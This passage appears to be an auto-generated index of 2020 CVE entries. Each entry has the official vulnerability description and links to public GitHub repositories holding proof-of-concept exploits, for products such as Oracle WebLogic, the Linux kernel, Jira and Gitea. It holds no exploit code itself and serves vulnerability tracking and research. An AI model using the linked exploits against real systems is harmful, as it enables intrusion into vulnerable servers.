IceWarp Email Server 12.3.0.1 allows remote attackers to upload JavaScript files that are dangerous for clients to access.
- [networksecure/CVE-2020-14066](https://github.com/networksecure/CVE-2020-14066)
- [pinpinsec/CVE-2020-14066](https://github.com/pinpinsec/CVE-2020-14066)
### CVE-2020-14144 (2020-10-16)
The git hook feature in Gitea 1.1.0 through 1.12.5 might allow for authenticated remote code execution in customer environments where the documentation was not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a very limited subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides.
- [p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce](https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce)
### CVE-2020-14179 (2020-09-21)
Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1.
- [c0brabaghdad1/CVE-2020-14179](https://github.com/c0brabaghdad1/CVE-2020-14179)
- [mrnazu/CVE-2020-14179](https://github.com/mrnazu/CVE-2020-14179)
- [0x0060/CVE-2020-14179](https://github.com/0x0060/CVE-2020-14179)
### CVE-2020-14181 (2020-09-17)
Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.
- [und3sc0n0c1d0/UserEnumJira](https://github.com/und3sc0n0c1d0/UserEnumJira)
- [Rival420/CVE-2020-14181](https://github.com/Rival420/CVE-2020-14181)
- [bk-rao/CVE-2020-14181](https://github.com/bk-rao/CVE-2020-14181)
### CVE-2020-14195 (2020-06-16)
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity).
- [Al1ex/CVE-2020-14195](https://github.com/Al1ex/CVE-2020-14195)
### CVE-2020-14210 (2020-06-16)
Reflected Cross-Site Scripting (XSS) vulnerability in MONITORAPP WAF in which script can be executed when responding to Request URL information. It provides a function to response to Request URL information when blocking.
- [monitorapp-aicc/report](https://github.com/monitorapp-aicc/report)
### CVE-2020-14292 (2020-09-09)
In the COVIDSafe application through 1.0.21 for Android, unsafe use of the Bluetooth transport option in the GATT connection allows attackers to trick the application into establishing a connection over Bluetooth BR/EDR transport, which reveals the public Bluetooth address of the victim's phone without authorisation, bypassing the Bluetooth address randomisation protection in the user's phone.
- [alwentiu/CVE-2020-14292](https://github.com/alwentiu/CVE-2020-14292)
### CVE-2020-14293 (2020-10-02)
conf_datetime in Secudos DOMOS 5.8 allows remote attackers to execute arbitrary commands as root via shell metacharacters in the zone field (obtained from the web interface).
- [patrickhener/CVE-2020-14293](https://github.com/patrickhener/CVE-2020-14293)
### CVE-2020-14294 (2020-10-02)
An issue was discovered in Secudos Qiata FTA 1.70.19. The comment feature allows persistent XSS that is executed when reading transfer comments or the global notice board.
- [patrickhener/CVE-2020-14294](https://github.com/patrickhener/CVE-2020-14294)
### CVE-2020-14295 (2020-06-17)
A SQL injection issue in color.php in Cacti 1.2.12 allows an admin to inject SQL via the filter parameter. This can lead to remote command execution because the product accepts stacked queries.
- [0z09e/CVE-2020-14295](https://github.com/0z09e/CVE-2020-14295)
- [mrg3ntl3m4n/CVE-2020-14295](https://github.com/mrg3ntl3m4n/CVE-2020-14295)
### CVE-2020-14321 (2022-08-16)
In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, teachers of a course were able to assign themselves the manager role within that course.
- [HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321)
- [lanzt/CVE-2020-14321](https://github.com/lanzt/CVE-2020-14321)
- [f0ns1/CVE-2020-14321-modified-exploit](https://github.com/f0ns1/CVE-2020-14321-modified-exploit)
### CVE-2020-14343 (2021-02-09)
A vulnerability was discovered in the PyYAML library in versions before 5.4, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. This flaw allows an attacker to execute arbitrary code on the system by abusing the python/object/new constructor. This flaw is due to an incomplete fix for CVE-2020-1747.
- [j4k0m/loader-CVE-2020-14343](https://github.com/j4k0m/loader-CVE-2020-14343)
### CVE-2020-14356 (2020-08-19)
A flaw null pointer dereference in the Linux kernel cgroupv2 subsystem in versions before 5.7.10 was found in the way when reboot the system. A local user could use this flaw to crash the system or escalate their privileges on the system.
- [ShaikUsaf/linux-4.19.72_CVE-2020-14356](https://github.com/ShaikUsaf/linux-4.19.72_CVE-2020-14356)
### CVE-2020-14364 (2020-08-31)
An out-of-bounds read/write access flaw was found in the USB emulator of the QEMU in versions before 5.2.0. This issue occurs while processing USB packets from a guest when USBDevice 'setup_len' exceeds its 'data_buf[4096]' in the do_token_in, do_token_out routines. This flaw allows a guest user to crash the QEMU process, resulting in a denial of service, or the potential execution of arbitrary code with the privileges of the QEMU process on the host.
- [gejian-iscas/CVE-2020-14364](https://github.com/gejian-iscas/CVE-2020-14364)
- [y-f00l/CVE-2020-14364](https://github.com/y-f00l/CVE-2020-14364)
### CVE-2020-14368 (2020-12-14)
A flaw was found in Eclipse Che in versions prior to 7.14.0 that impacts CodeReady Workspaces. When configured with cookies authentication, Theia IDE doesn't properly set the SameSite value, allowing a Cross-Site Request Forgery (CSRF) and consequently allowing a cross-site WebSocket hijack on Theia IDE. This flaw allows an attacker to gain full access to the victim's workspace through the /services endpoint. To perform a successful attack, the attacker conducts a Man-in-the-middle attack (MITM) and tricks the victim into executing a request via an untrusted link, which performs the CSRF and the Socket hijack. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
- [codingchili/CVE-2020-14368](https://github.com/codingchili/CVE-2020-14368)
### CVE-2020-14372 (2021-03-03)
A flaw was found in grub2 in versions prior to 2.06, where it incorrectly enables the usage of the ACPI command when Secure Boot is enabled. This flaw allows an attacker with privileged access to craft a Secondary System Description Table (SSDT) containing code to overwrite the Linux kernel lockdown variable content directly into memory. The table is further loaded and executed by the kernel, defeating its Secure Boot lockdown and allowing the attacker to load unsigned code. The highest threat from this vulnerability is to data confidentiality and integrity, as well as system availability.
- [kukrimate/CVE-2020-14372](https://github.com/kukrimate/CVE-2020-14372)
### CVE-2020-14381 (2020-12-03)
A flaw was found in the Linux kernel’s futex implementation. This flaw allows a local attacker to corrupt system memory or escalate their privileges when creating a futex on a filesystem that is about to be unmounted. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
- [nanopathi/linux-4.19.72_CVE-2020-14381](https://github.com/nanopathi/linux-4.19.72_CVE-2020-14381)
### CVE-2020-14386 (2020-09-16)
A flaw was found in the Linux kernel before 5.9-rc4. Memory corruption can be exploited to gain root privileges from unprivileged processes. The highest threat from this vulnerability is to data confidentiality and integrity.
- [cgwalters/cve-2020-14386](https://github.com/cgwalters/cve-2020-14386)
### CVE-2020-14644 (2020-07-15)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [0xkami/cve-2020-14644](https://github.com/0xkami/cve-2020-14644)
### CVE-2020-14645 (2020-07-15)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [Y4er/CVE-2020-14645](https://github.com/Y4er/CVE-2020-14645)
- [DaBoQuan/CVE-2020-14645](https://github.com/DaBoQuan/CVE-2020-14645)
- [ChenZIDu/CVE-2020-14645](https://github.com/ChenZIDu/CVE-2020-14645)
- [HYWZ36/CVE-2020-14645-code](https://github.com/HYWZ36/CVE-2020-14645-code)
- [Schira4396/CVE-2020-14645](https://github.com/Schira4396/CVE-2020-14645)
### CVE-2020-14750 (2020-11-01)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [pprietosanchez/CVE-2020-14750](https://github.com/pprietosanchez/CVE-2020-14750)
- [kkhacklabs/CVE-2020-14750](https://github.com/kkhacklabs/CVE-2020-14750)
### CVE-2020-14756 (2021-01-20)
Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Core Components). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [Y4er/CVE-2020-14756](https://github.com/Y4er/CVE-2020-14756)
- [somatrasss/weblogic2021](https://github.com/somatrasss/weblogic2021)
### CVE-2020-14871 (2020-10-21)
Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. Note: This CVE is not exploitable for Solaris 11.1 and later releases, and ZFSSA 8.7 and later releases, thus the CVSS Base Score is 0.0. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
- [robidev/CVE-2020-14871-Exploit](https://github.com/robidev/CVE-2020-14871-Exploit)
### CVE-2020-14882 (2020-10-21)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [zhzyker/exphub](https://github.com/zhzyker/exphub)
- [jas502n/CVE-2020-14882](https://github.com/jas502n/CVE-2020-14882)
- [s1kr10s/CVE-2020-14882](https://github.com/s1kr10s/CVE-2020-14882)
- [XTeam-Wing/CVE-2020-14882](https://github.com/XTeam-Wing/CVE-2020-14882)
- [0thm4n3/cve-2020-14882](https://github.com/0thm4n3/cve-2020-14882)
- [wsfengfan/cve-2020-14882](https://github.com/wsfengfan/cve-2020-14882)
- [alexfrancow/CVE-2020-14882](https://github.com/alexfrancow/CVE-2020-14882)
- [GGyao/CVE-2020-14882_POC](https://github.com/GGyao/CVE-2020-14882_POC)
- [ludy-dev/Weblogic_Unauthorized-bypass-RCE](https://github.com/ludy-dev/Weblogic_Unauthorized-bypass-RCE)
- [GGyao/CVE-2020-14882_ALL](https://github.com/GGyao/CVE-2020-14882_ALL)
- [ovProphet/CVE-2020-14882-checker](https://github.com/ovProphet/CVE-2020-14882-checker)
- [NS-Sp4ce/CVE-2020-14882](https://github.com/NS-Sp4ce/CVE-2020-14882)
- [mmioimm/cve-2020-14882](https://github.com/mmioimm/cve-2020-14882)
- [QmF0c3UK/CVE-2020-14882](https://github.com/QmF0c3UK/CVE-2020-14882)
- [murataydemir/CVE-2020-14882](https://github.com/murataydemir/CVE-2020-14882)
- [Ormicron/CVE-2020-14882-GUI-Test](https://github.com/Ormicron/CVE-2020-14882-GUI-Test)
- [corelight/CVE-2020-14882-weblogicRCE](https://github.com/corelight/CVE-2020-14882-weblogicRCE)
- [xfiftyone/CVE-2020-14882](https://github.com/xfiftyone/CVE-2020-14882)
- [BabyTeam1024/CVE-2020-14882](https://github.com/BabyTeam1024/CVE-2020-14882)
- [adm1in/CodeTest](https://github.com/adm1in/CodeTest)
- [pwn3z/CVE-2020-14882-WebLogic](https://github.com/pwn3z/CVE-2020-14882-WebLogic)
- [milo2012/CVE-2020-14882](https://github.com/milo2012/CVE-2020-14882)
- [kk98kk0/CVE-2020-14882](https://github.com/kk98kk0/CVE-2020-14882)
- [exploitblizzard/CVE-2020-14882-WebLogic](https://github.com/exploitblizzard/CVE-2020-14882-WebLogic)
- [qianniaoge/CVE-2020-14882_Exploit_Gui](https://github.com/qianniaoge/CVE-2020-14882_Exploit_Gui)
- [N0Coriander/CVE-2020-14882-14883](https://github.com/N0Coriander/CVE-2020-14882-14883)
- [lolminerxmrig/CVE-2020-14882_ALL](https://github.com/lolminerxmrig/CVE-2020-14882_ALL)
- [nik0nz7/CVE-2020-14882](https://github.com/nik0nz7/CVE-2020-14882)
- [Danny-LLi/CVE-2020-14882](https://github.com/Danny-LLi/CVE-2020-14882)
- [LucasPDiniz/CVE-2020-14882](https://github.com/LucasPDiniz/CVE-2020-14882)
- [xMr110/CVE-2020-14882](https://github.com/xMr110/CVE-2020-14882)
### CVE-2020-14883 (2020-10-21)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
- [murataydemir/CVE-2020-14883](https://github.com/murataydemir/CVE-2020-14883)
- [B1anda0/CVE-2020-14883](https://github.com/B1anda0/CVE-2020-14883)
- [fan1029/CVE-2020-14883EXP](https://github.com/fan1029/CVE-2020-14883EXP)
- [Osyanina/westone-CVE-2020-14883-scanner](https://github.com/Osyanina/westone-CVE-2020-14883-scanner)
- [1n7erface/PocList](https://github.com/1n7erface/PocList)
- [amacloudobia/CVE-2020-14883](https://github.com/amacloudobia/CVE-2020-14883)
### CVE-2020-14947 (2020-06-30)
OCS Inventory NG 2.7 allows Remote Command Execution via shell metacharacters to require/commandLine/CommandLine.php because mib_file in plugins/main_sections/ms_config/ms_snmp_config.php is mishandled in get_mib_oid.
- [mhaskar/CVE-2020-14947](https://github.com/mhaskar/CVE-2020-14947)
### CVE-2020-14955 (2020-06-26)
In Jiangmin Antivirus 16.0.13.129, the driver file (KVFG.sys) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x220440.
- [intrigus-lgtm/CVE-2020-14955](https://github.com/intrigus-lgtm/CVE-2020-14955)
### CVE-2020-14965 (2020-06-23)
On TP-Link TL-WR740N v4 and TL-WR740ND v4 devices, an attacker with access to the admin panel can inject HTML code and change the HTML context of the target pages and stations in the access-control settings via targets_lists_name or hosts_lists_name. The vulnerability can also be exploited through a CSRF, requiring no authentication as an administrator.
- [g-rubert/CVE-2020-14965](https://github.com/g-rubert/CVE-2020-14965)
### CVE-2020-14974 (2020-06-23)
The driver in IOBit Unlocker 1.1.2 allows a low-privileged user to unlock a file and kill processes (even ones running as SYSTEM) that hold a handle, via IOCTL code 0x222124.
- [Aterror2be/CVE-2020-14974](https://github.com/Aterror2be/CVE-2020-14974)
### CVE-2020-15002 (2020-10-23)
OX App Suite through 7.10.3 allows SSRF via the the /ajax/messaging/message message API.
- [skr0x1c0/Blind-SSRF-CVE-2020-15002](https://github.com/skr0x1c0/Blind-SSRF-CVE-2020-15002)
- [skr0x1c0/SSRF-CVE-2020-15002](https://github.com/skr0x1c0/SSRF-CVE-2020-15002)
### CVE-2020-15051 (2020-07-15)
An issue was discovered in Artica Proxy before 4.30.000000. Stored XSS exists via the Server Domain Name, Your Email Address, Group Name, MYSQL Server, Database, MYSQL Username, Group Name, and Task Description fields.
- [pratikshad19/CVE-2020-15051](https://github.com/pratikshad19/CVE-2020-15051)
### CVE-2020-15052 (2020-07-20)
An issue was discovered in Artica Proxy CE before 4.28.030.418. SQL Injection exists via the Netmask, Hostname, and Alias fields.
- [pratikshad19/CVE-2020-15052](https://github.com/pratikshad19/CVE-2020-15052)
### CVE-2020-15053 (2020-07-20)
An issue was discovered in Artica Proxy CE before 4.28.030.418. Reflected XSS exists via these search fields: real time request, System Events, Proxy Events, Proxy Objects, and Firewall objects.
- [pratikshad19/CVE-2020-15053](https://github.com/pratikshad19/CVE-2020-15053)
### CVE-2020-15148 (2020-09-15)
Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. This is fixed in version 2.0.38. A possible workaround without upgrading is available in the linked advisory.
- [Maskhe/CVE-2020-15148-bypasses](https://github.com/Maskhe/CVE-2020-15148-bypasses)
- [0xkami/cve-2020-15148](https://github.com/0xkami/cve-2020-15148)
### CVE-2020-15169 (2020-09-11)
In Action View before versions 5.2.4.4 and 6.0.3.3 there is a potential Cross-Site Scripting (XSS) vulnerability in Action View's translation helpers. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks. When an HTML-unsafe string is passed as the default for a missing translation key named html or ending in _html, the default string is incorrectly marked as HTML-safe and not escaped. This is patched in versions 6.0.3.3 and 5.2.4.4. A workaround without upgrading is proposed in the source advisory.
- [glasses618/CVE-2020-15169](https://github.com/glasses618/CVE-2020-15169)
### CVE-2020-15175 (2020-10-07)
In GLPI before version 9.5.2, the `pluginimage.send.php` endpoint allows a user to specify an image from a plugin. The parameters can be maliciously crafted to instead delete the .htaccess file for the files directory. Any user becomes able to read all the files and folders contained in “/files/”. Some of the sensitive information that is compromised are the user sessions, logs, and more. An attacker would be able to get the Administrators session token and use that to authenticate. The issue is patched in version 9.5.2.
- [Xn2/GLPwn](https://github.com/Xn2/GLPwn)
### CVE-2020-15227 (2020-10-01)
Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
- [Langriklol/CVE-2020-15227](https://github.com/Langriklol/CVE-2020-15227)
- [hu4wufu/CVE-2020-15227](https://github.com/hu4wufu/CVE-2020-15227)
- [filipsedivy/CVE-2020-15227](https://github.com/filipsedivy/CVE-2020-15227)
### CVE-2020-15228 (2020-10-01)
In the `@actions/core` npm module before version 1.2.6,`addPath` and `exportVariable` functions communicate with the Actions Runner over stdout by generating a string in a specific format. Workflows that log untrusted data to stdout may invoke these commands, resulting in the path or environment variables being modified without the intention of the workflow or action author. The runner will release an update that disables the `set-env` and `add-path` workflow commands in the near future. For now, users should upgrade to `@actions/core v1.2.6` or later, and replace any instance of the `set-env` or `add-path` commands in their workflows with the new Environment File Syntax. Workflows and actions using the old commands or older versions of the toolkit will start to warn, then error out during workflow execution.
- [guettli/fix-CVE-2020-15228](https://github.com/guettli/fix-CVE-2020-15228)
### CVE-2020-15257 (2020-12-01)
containerd is an industry-standard container runtime and is available as a daemon for Linux and Windows. In containerd before versions 1.3.9 and 1.4.3, the containerd-shim API is improperly exposed to host network containers. Access controls for the shim’s API socket verified that the connecting process had an effective UID of 0, but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious containers running in the same network namespace as the shim, with an effective UID of 0 but otherwise reduced privileges, to cause new processes to be run with elevated privileges. This vulnerability has been fixed in containerd 1.3.9 and 1.4.3. Users should update to these versions as soon as they are released. It should be noted that containers started with an old version of containerd-shim should be stopped and restarted, as running containers will continue to be vulnerable even after an upgrade. If you are not providing the ability for untrusted users to start containers in the same network namespace as the shim (typically the "host" network namespace, for example with docker run --net=host or hostNetwork: true in a Kubernetes pod) and run with an effective UID of 0, you are not vulnerable to this issue. If you are running containers with a vulnerable configuration, you can deny access to all abstract sockets with AppArmor by adding a line similar to deny unix addr=@**, to your policy. It is best practice to run containers with a reduced set of privileges, with a non-zero UID, and with isolated namespaces. The containerd maintainers strongly advise against sharing namespaces with the host. Reducing the set of isolation mechanisms used for a container necessarily increases that container's privilege, regardless of what container runtime is used for running that container.
- [nccgroup/abstractshimmer](https://github.com/nccgroup/abstractshimmer)
### CVE-2020-15261 (2020-10-19)
On Windows the Veyon Service before version 4.4.2 contains an unquoted service path vulnerability, allowing locally authenticated users with administrative privileges to run malicious executables with LocalSystem privileges. Since Veyon users (both students and teachers) usually don't have administrative privileges, this vulnerability is only dangerous in anyway unsafe setups. The problem has been fixed in version 4.4.2. As a workaround, the exploitation of the vulnerability can be prevented by revoking administrative privileges from all potentially untrustworthy users.
- [yaoyao-cool/CVE-2020-15261](https://github.com/yaoyao-cool/CVE-2020-15261)
### CVE-2020-15349 (2020-11-17)
BinaryNights ForkLift 3.x before 3.4 has a local privilege escalation vulnerability because the privileged helper tool implements an XPC interface that allows file operations to any process (copy, move, delete) as root and changing permissions.
- [Traxes/Forklift_LPE](https://github.com/Traxes/Forklift_LPE)
### CVE-2020-15367 (2020-07-07)
Venki Supravizio BPM 10.1.2 does not limit the number of authentication attempts. An unauthenticated user may exploit this vulnerability to launch a brute-force authentication attack against the Login page.
- [inflixim4be/CVE-2020-15367](https://github.com/inflixim4be/CVE-2020-15367)
### CVE-2020-15368 (2020-06-29)
AsrDrv103.sys in the ASRock RGB Driver does not properly restrict access from user space, as demonstrated by triggering a triple fault via a request to zero CR3.
- [stong/CVE-2020-15368](https://github.com/stong/CVE-2020-15368)
- [R7flex/asrockploit](https://github.com/R7flex/asrockploit)
### CVE-2020-15392 (2020-07-07)
A user enumeration vulnerability flaw was found in Venki Supravizio BPM 10.1.2. This issue occurs during password recovery, where a difference in error messages could allow an attacker to determine if a username is valid or not, enabling a brute-force attack with valid usernames.
- [inflixim4be/CVE-2020-15392](https://github.com/inflixim4be/CVE-2020-15392)
### CVE-2020-15399
- [mkelepce/CVE-2020-15399](https://github.com/mkelepce/CVE-2020-15399)
### CVE-2020-15416 (2020-07-28)
This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6700 V1.0.4.84_10.0.58 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the httpd service, which listens on TCP port 80 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9703.
- [k3vinlusec/R7000_httpd_BOF_CVE-2020-15416](https://github.com/k3vinlusec/R7000_httpd_BOF_CVE-2020-15416)
### CVE-2020-15436 (2020-11-23)
Use-after-free vulnerability in fs/block_dev.c in the Linux kernel before 5.8 allows local users to gain privileges or cause a denial of service by leveraging improper access to a certain error field.
- [Trinadh465/linux-4.19.72_CVE-2020-15436](https://github.com/Trinadh465/linux-4.19.72_CVE-2020-15436)
### CVE-2020-15492 (2020-07-23)
An issue was discovered in INNEO Startup TOOLS 2017 M021 12.0.66.3784 through 2018 M040 13.0.70.3804. The sut_srv.exe web application (served on TCP port 85) includes user input into a filesystem access without any further validation. This might allow an unauthenticated attacker to read files on the server via Directory Traversal, or possibly have unspecified other impact.
- [patrickhener/CVE-2020-15492](https://github.com/patrickhener/CVE-2020-15492)
### CVE-2020-15568 (2021-01-30)
TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.
- [n0bugz/CVE-2020-15568](https://github.com/n0bugz/CVE-2020-15568)
- [divinepwner/TerraMaster-TOS-CVE-2020-15568](https://github.com/divinepwner/TerraMaster-TOS-CVE-2020-15568)
### CVE-2020-15778 (2020-07-24)
scp in OpenSSH through 8.3p1 allows command injection in the scp.c toremote function, as demonstrated by backtick characters in the destination argument. NOTE: the vendor reportedly has stated that they intentionally omit validation of "anomalous argument transfers" because that could "stand a great chance of breaking existing workflows."
- [cpandya2909/CVE-2020-15778](https://github.com/cpandya2909/CVE-2020-15778)
- [Neko-chanQwQ/CVE-2020-15778-Exploit](https://github.com/Neko-chanQwQ/CVE-2020-15778-Exploit)
- [Evan-Zhangyf/CVE-2020-15778](https://github.com/Evan-Zhangyf/CVE-2020-15778)
### CVE-2020-15780 (2020-07-15)
An issue was discovered in drivers/acpi/acpi_configfs.c in the Linux kernel before 5.7.7. Injection of malicious ACPI tables via configfs could be used by attackers to bypass lockdown and secure boot restrictions, aka CID-75b0cea7bf30.
- [Annavid/CVE-2020-15780-exploit](https://github.com/Annavid/CVE-2020-15780-exploit)
### CVE-2020-15802 (2020-09-11)
Devices supporting Bluetooth before 5.1 may allow man-in-the-middle attacks, aka BLURtooth. Cross Transport Key Derivation in Bluetooth Core Specification v4.2 and v5.0 may permit an unauthenticated user to establish a bonding with one transport, either LE or BR/EDR, and replace a bonding already established on the opposing transport, BR/EDR or LE, potentially overwriting an authenticated key with an unauthenticated key, or a key with greater entropy with one with less.
- [francozappa/blur](https://github.com/francozappa/blur)
### CVE-2020-15808
- [manucuf/CVE202015808](https://github.com/manucuf/CVE202015808)
### CVE-2020-15848
- [faklad/CVE-2020-15848](https://github.com/faklad/CVE-2020-15848)
### CVE-2020-15873 (2020-07-21)
In LibreNMS before 1.65.1, an authenticated attacker can achieve SQL Injection via the customoid.inc.php device_id POST parameter to ajax_form.php.
- [limerencee/cs4239-cve-2020-15873](https://github.com/limerencee/cs4239-cve-2020-15873)
### CVE-2020-15906 (2020-10-22)
tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
- [S1lkys/CVE-2020-15906](https://github.com/S1lkys/CVE-2020-15906)
### CVE-2020-15916 (2020-07-23)
goform/AdvSetLanip endpoint on Tenda AC15 AC1900 15.03.05.19 devices allows remote attackers to execute arbitrary system commands via shell metacharacters in the lanIp POST parameter.
- [geniuszlyy/CVE-2020-15916](https://github.com/geniuszlyy/CVE-2020-15916)
### CVE-2020-15931 (2020-10-20)
Netwrix Account Lockout Examiner before 5.1 allows remote attackers to capture the Net-NTLMv1/v2 authentication challenge hash of the Domain Administrator (that is configured within the product in its installation state) by generating a single Kerberos Pre-Authentication Failed (ID 4771) event on a Domain Controller.
- [optiv/CVE-2020-15931](https://github.com/optiv/CVE-2020-15931)
### CVE-2020-15956 (2020-08-04)
ActiveMediaServer.exe in ACTi NVR3 Standard Server 3.0.12.42 allows remote unauthenticated attackers to trigger a buffer overflow and application termination via a malformed payload.
- [megamagnus/cve-2020-15956](https://github.com/megamagnus/cve-2020-15956)
### CVE-2020-15999 (2020-11-03)
Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [oxfemale/CVE-2020-15999](https://github.com/oxfemale/CVE-2020-15999)
- [maarlo/CVE-2020-15999](https://github.com/maarlo/CVE-2020-15999)
- [Marmeus/CVE-2020-15999](https://github.com/Marmeus/CVE-2020-15999)
### CVE-2020-16012 (2021-01-08)
Side-channel information leakage in graphics in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to leak cross-origin data via a crafted HTML page.
- [aleksejspopovs/cve-2020-16012](https://github.com/aleksejspopovs/cve-2020-16012)
### CVE-2020-16125 (2020-11-10)
gdm3 versions before 3.36.2 or 3.38.2 would start gnome-initial-setup if gdm3 can't contact the accountservice service via dbus in a timely manner; on Ubuntu (and potentially derivatives) this could be be chained with an additional issue that could allow a local user to create a new privileged account.
- [za970120604/CVE-2020-16125-Reproduction](https://github.com/za970120604/CVE-2020-16125-Reproduction)
### CVE-2020-16126 (2020-11-11)
An Ubuntu-specific modification to AccountsService in versions before 0.6.55-0ubuntu13.2, among other earlier versions, improperly dropped the ruid, allowing untrusted users to send signals to AccountService, thus stopping it from handling D-Bus messages in a timely fashion.
- [zev3n/Ubuntu-Gnome-privilege-escalation](https://github.com/zev3n/Ubuntu-Gnome-privilege-escalation)
### CVE-2020-16152 (2021-11-14)
The NetConfig UI administrative interface in Extreme Networks ExtremeWireless Aerohive HiveOS and IQ Engine through 10.0r8a allows attackers to execute PHP code as the root user via remote HTTP requests that insert this code into a log file and then traverse to that file.
- [eriknl/CVE-2020-16152](https://github.com/eriknl/CVE-2020-16152)
